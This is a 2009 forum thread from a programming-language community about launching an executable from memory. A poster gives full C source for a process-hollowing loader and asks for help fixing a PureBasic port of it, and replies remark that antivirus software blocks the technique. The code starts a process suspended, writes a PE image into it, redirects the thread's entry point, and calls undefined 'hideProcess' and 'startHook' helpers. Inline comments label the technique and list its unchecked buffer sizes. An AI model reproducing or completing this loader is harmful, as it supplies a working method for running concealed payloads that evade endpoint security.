
Posted: Sun Mar 22, 2009 12:42 am
by J. Baker
I take it this lib is dead? Does anyone know of an update or something similar?

Posted: Sun Mar 22, 2009 2:57 am
by Mistrel
I don't think it's possible with DEP on modern CPUs.

Posted: Sun Mar 22, 2009 4:53 am
by Poshu
Too bad, it could be useful from time to time.

Posted: Tue Apr 07, 2009 1:44 pm
by ALAN-MHz
I want to try this source that I found on the net, but I make mistakes when converting it to PureBasic; can anyone help me?


/*
 * RunFromMemory - start the program named by pPath in a suspended state, write
 * a PE image held in memory (pImage) into that process at the image's
 * ImageBase, point the initial thread at the image's entry point and resume it.
 *
 * pImage: raw PE file contents. No length is passed, so every header and
 *         section read below trusts the offsets and sizes stored in the image.
 * pPath:  passed to CreateProcess as the command line.
 *
 * The call sequence used here (CREATE_SUSPENDED child, cross-process write at
 * the image base, thread-context change, resume) is the pattern catalogued as
 * process hollowing (MITRE ATT&CK T1055.012). Endpoint products typically
 * monitor this sequence, which is consistent with the replies in this thread
 * reporting that antivirus software blocks the code.
 *
 * 32-bit x86 only as written: pointers are cast to DWORD and the CONTEXT
 * fields used are Ebx and Eax.
 *
 * secAttrib, hideProcess and startHook are not defined in this listing.
 * No API return value other than CreateProcess's is checked, and the process
 * and thread handles in peProcessInformation are never closed.
 */
void RunFromMemory(char* pImage,char* pPath)
{
    DWORD dwWritten = 0;
    DWORD dwHeader = 0;
    DWORD dwImageSize = 0;
    DWORD dwSectionCount = 0;
    DWORD dwSectionSize = 0;
    DWORD firstSection = 0;
    DWORD previousProtection = 0;
    DWORD jmpSize = 0;

    IMAGE_NT_HEADERS INH;
    IMAGE_DOS_HEADER IDH;
    IMAGE_SECTION_HEADER Sections[1000];

    PROCESS_INFORMATION peProcessInformation;
    STARTUPINFO peStartUpInformation;
    CONTEXT pContext;

    char* pMemory;
    char* pFile;
    // Copy the DOS header, then the NT headers located via e_lfanew.
    // NOTE(review): neither header signature nor e_lfanew is validated.
    memcpy(&IDH,pImage,sizeof(IDH));
    memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));
        
    // Local staging buffer sized from the image's own SizeOfImage field.
    // NOTE(review): the malloc result is passed to memset without a NULL check.
    dwImageSize = INH.OptionalHeader.SizeOfImage;
    pMemory = (char*)malloc(dwImageSize);
    memset(pMemory,0,dwImageSize);
    pFile = pMemory;

    dwHeader = INH.OptionalHeader.SizeOfHeaders;
    firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
    // NOTE(review): NumberOfSections headers are copied into the 1000-entry
    // stack array without comparing the count to the array size, so a header
    // declaring more sections overruns Sections.
    memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);

    // Copy SizeOfHeaders bytes into the staging buffer; SizeOfHeaders is not
    // compared with SizeOfImage (the buffer size) first.
    memcpy(pFile,pImage,dwHeader);

    // Round SizeOfHeaders up to a multiple of SectionAlignment.
    // NOTE(review): a SectionAlignment of 0 in the image divides by zero here.
    if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders;
    }
    else
    {
        jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
        jmpSize += 1;
        jmpSize *= INH.OptionalHeader.SectionAlignment;
    }

    // Move the write cursor past the aligned header area.
    pFile = (char*)((DWORD)pFile + jmpSize);

    // Copy each section's raw data to the cursor, then advance the cursor by
    // that section's VirtualSize rounded up to SectionAlignment.
    // NOTE(review): SizeOfRawData and PointerToRawData come straight from the
    // image and are not checked against either buffer.
    for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
    {
        jmpSize = 0;
        dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
        memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);
        
        if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
        }
        else
        {
            jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
            jmpSize += 1;
            jmpSize *= INH.OptionalHeader.SectionAlignment;
        }
        pFile = (char*)((DWORD)pFile + jmpSize);
    }


    memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
    memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
    memset(&pContext,0,sizeof(CONTEXT));

    peStartUpInformation.cb = sizeof(peStartUpInformation);
    // The child is created suspended, so its initial thread has not run yet
    // when the writes below take place.
    if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED, NULL,NULL,&peStartUpInformation,&peProcessInformation))
    {
        // External helpers, not shown on this page. Their names suggest hiding
        // the child process and installing a hook; that cannot be confirmed
        // from this listing.
        hideProcess(peProcessInformation.dwProcessId);
        startHook(peProcessInformation.hProcess);
        // Read the suspended thread's register state.
        pContext.ContextFlags = CONTEXT_FULL;
        GetThreadContext(peProcessInformation.hThread,&pContext);
        // Make the region at ImageBase in the child readable, writable and
        // executable, then write the staged image there. A cross-process
        // protection change to PAGE_EXECUTE_READWRITE followed by
        // WriteProcessMemory is a commonly monitored pair of events.
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
        // Write the 4-byte ImageBase value at (Ebx + 8) in the child.
        // Presumably this is the image-base field of the child's PEB on
        // 32-bit Windows - TODO confirm.
        WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
        // Set Eax to the image's entry point and apply the modified context;
        // the thread thread mentions SetThreadContext as what AV products react to.
        pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
        SetThreadContext(peProcessInformation.hThread,&pContext);
        // Restore the protection value saved by the first VirtualProtectEx call.
        VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
        ResumeThread(peProcessInformation.hThread);
    }
    // Release the local staging buffer (runs whether or not CreateProcess succeeded).
    free(pMemory);
}
My PureBasic conversion (which does not work):


; PureBasic declaration of a PE section header, with the same field names the
; C listing on this page reads through IMAGE_SECTION_HEADER.
Structure IMAGE_SECTION_HEADER
 ; 8-byte section name
 Name.b[8]
 ; PhysicalAddress and VirtualSize share the same storage
 StructureUnion
 PhysicalAddress.l
 VirtualSize.l
 EndStructureUnion
 VirtualAddress.l
 ; SizeOfRawData / PointerToRawData are the two fields RunFromMemory uses to
 ; locate and size each section's bytes in the source image
 SizeOfRawData.l
 PointerToRawData.l
 PointerToRelocations.l
 PointerToLinenumbers.l
 NumberOfRelocations.w
 NumberOfLinenumbers.w
 Characteristics.l
EndStructure 

; RunFromMemory - PureBasic port of the C routine of the same name shown
; earlier in this post; the poster reports that this port does not work.
;
; *pImage : address of a PE file image held in memory. No length is passed,
;           so all header and section offsets are taken from the image as-is.
; *pPath  : passed to CreateProcess_ as the command line.
;
; The API sequence (process created with #CREATE_SUSPENDED, WriteProcessMemory_
; at the image base, SetThreadContext_, ResumeThread_) is the pattern
; catalogued as process hollowing (MITRE ATT&CK T1055.012); later replies in
; this thread report that antivirus software blocks it.
;
; No API result other than CreateProcess_'s is checked, and the process and
; thread handles are not closed.
Procedure RunFromMemory ( *pImage , *pPath )

 Protected dwWritten.l = 0
 Protected dwHeader.l = 0
 Protected dwImageSize.l = 0
 Protected dwSectionCount.l = 0
 Protected dwSectionSize.l = 0
 Protected firstSection.l = 0
 Protected previousProtection.l = 0
 Protected jmpSize.l = 0
 
 ; Wrapper giving indexed access to up to 1000 section headers
 Structure IMAGE_SECTION_HEADERS
  a.IMAGE_SECTION_HEADER[1000]
 EndStructure 
 
 *INH.IMAGE_NT_HEADERS
 *IDH.IMAGE_DOS_HEADER
 peProcessInformation.PROCESS_INFORMATION
 peStartUpInformation.STARTUPINFO
 pContext.CONTEXT
 *Sections.IMAGE_SECTION_HEADERS 
 *pMemory
 *pFile
 
 ; Header copies, mirroring the two memcpy calls at the top of the C routine
 CopyMemory ( @IDH , *pImage , SizeOf(*IDH) )
 CopyMemory ( @INH , ( *pImage + *IDH\e_lfanew ) , SizeOf(*INH) )
 
 ; Staging buffer sized from the image's own SizeOfImage field
 dwImageSize = *INH\OptionalHeader\SizeOfImage
 *pMemory = AllocateMemory ( dwImageSize )
 *pFile = *pMemory
 
 dwHeader = *INH\OptionalHeader\SizeOfHeaders
 firstSection = *pImage + *IDH\e_lfanew + SizeOf ( IMAGE_NT_HEADERS )
 ; The section count comes from the image and is not compared with the
 ; 1000-entry capacity declared above
 CopyMemory ( *Sections , firstSection , ( SizeOf(IMAGE_SECTION_HEADER) * *INH\FileHeader\NumberOfSections ) )
 
 CopyMemory ( *pFile , *pImage , dwHeader )
 
 ; Round SizeOfHeaders up to a multiple of SectionAlignment
 If *INH\OptionalHeader\SizeOfHeaders % *INH\OptionalHeader\SectionAlignment = 0
  jmpSize = *INH\OptionalHeader\SizeOfHeaders
 Else
  jmpSize = *INH\OptionalHeader\SizeOfHeaders / *INH\OptionalHeader\SectionAlignment
  jmpSize + 1
  jmpSize * *INH\OptionalHeader\SectionAlignment
 EndIf
 
 *pFile + jmpSize
 
 ; Per section: copy SizeOfRawData bytes to the cursor, then advance the
 ; cursor by VirtualSize rounded up to SectionAlignment
 For dwSectionCount = 0 To ( *INH\FileHeader\NumberOfSections - 1 )
  jmpSize = 0
  dwSectionSize = *Sections\a[dwSectionCount]\SizeOfRawData
  CopyMemory ( *pFile , ( *pImage + *Sections\a[dwSectionCount]\PointerToRawData ) , dwSectionSize )
  
  If *Sections\a[dwSectionCount]\VirtualSize % *INH\OptionalHeader\SectionAlignment = 0
   jmpSize = *Sections\a[dwSectionCount]\VirtualSize
  Else
   jmpSize = *Sections\a[dwSectionCount]\VirtualSize / *INH\OptionalHeader\SectionAlignment
   jmpSize + 1
   jmpSize * *INH\OptionalHeader\SectionAlignment
  EndIf
  
  *pFile + jmpSize
 Next

 peStartUpInformation\cb = SizeOf(peStartUpInformation)
 ; Child process is created suspended; the calls inside the If operate on it
 ; before its initial thread has run
 If CreateProcess_ ( #NUL , *pPath , @secAttrib , #NUL , #False , #CREATE_SUSPENDED , #NUL , #NUL , @peStartUpInformation , @peProcessInformation )
  pContext\ContextFlags = #CONTEXT_FULL
  getthreadcontext_ ( peProcessInformation\hThread , @pContext )
  ; Cross-process protection change to #PAGE_EXECUTE_READWRITE followed by
  ; cross-process writes - a commonly monitored pair of events
  virtualprotectex_ ( peProcessInformation\hProcess , *INH\OptionalHeader\ImageBase , dwImageSize , #PAGE_EXECUTE_READWRITE , @previousProtection )
  WriteProcessMemory_ ( peProcessInformation\hProcess , *INH\OptionalHeader\ImageBase , *pMemory , dwImageSize , @dwWritten )
  WriteProcessMemory_ ( peProcessInformation\hProcess , ( pContext\Ebx + 8) , *INH\OptionalHeader\ImageBase , 4 , @dwWritten )
  ; Thread-context change on the suspended thread; a reply in this thread
  ; names SetThreadContext as the call AV products react to
  pContext\Eax = *INH\OptionalHeader\ImageBase + *INH\OptionalHeader\AddressOfEntryPoint
  SetThreadContext_( peProcessInformation\hThread , @Context )
  virtualprotectex_ ( peProcessInformation\hProcess , *INH\OptionalHeader\ImageBase , dwImageSize , previousProtection , 0 )
  ResumeThread_ ( peProcessInformation\hThread )
 EndIf 

 ; Release the local staging buffer
 FreeMemory ( *pMemory )
EndProcedure

Posted: Wed Apr 08, 2009 10:33 pm
by fsw
What's wrong with that :?:
http://www.purebasic.fr/english/viewtop ... c&start=61

It's there for several years.

Some AV software might not allow to run this piece of code though...

Posted: Wed Apr 08, 2009 11:05 pm
by ts-soft
fsw wrote:What's wrong with that :?:
http://www.purebasic.fr/english/viewtop ... c&start=61

It's there for several years.

Some AV software might not allow to run this piece of code though...
It hasn't worked on most PCs for several years :wink:

greetings

Thomas

Posted: Thu Apr 09, 2009 8:44 am
by ALAN-MHz
So there isn't actually a real solution for XP SP3 and Vista?

Posted: Mon Apr 20, 2009 4:36 pm
by Sandra M.
BoxedApp SDK ( http://boxedapp.com/boxedappsdk/ ) is able to launch exe from memory... But it's not free :oops:

Posted: Mon Apr 20, 2009 4:37 pm
by Sandra M.
fsw wrote:Some AV software might not allow to run this piece of code though...
Yeah, they don't like SetThreadContext ;)

Posted: Fri May 08, 2009 1:01 pm
by SFSxOI
OK, I have another stupid question. Why would you want to load the .exe into memory first and then launch it, rather than just launching it from the beginning?

Posted: Sat May 09, 2009 7:11 am
by Poshu
Well, it might (sometimes) be useful to launch an exe which is embedded in another one...

Sure, it might (sometime too) be harmful too...

Posted: Sat May 09, 2009 11:26 am
by thanos
Poshu wrote:Well, it might (sometime) be useful to launch an exe wich is embedded in another one...

Sure, it might (sometime too) be harmful too...
Because of installed antivirus programs, this solution often does not work.
Regards.

Thanos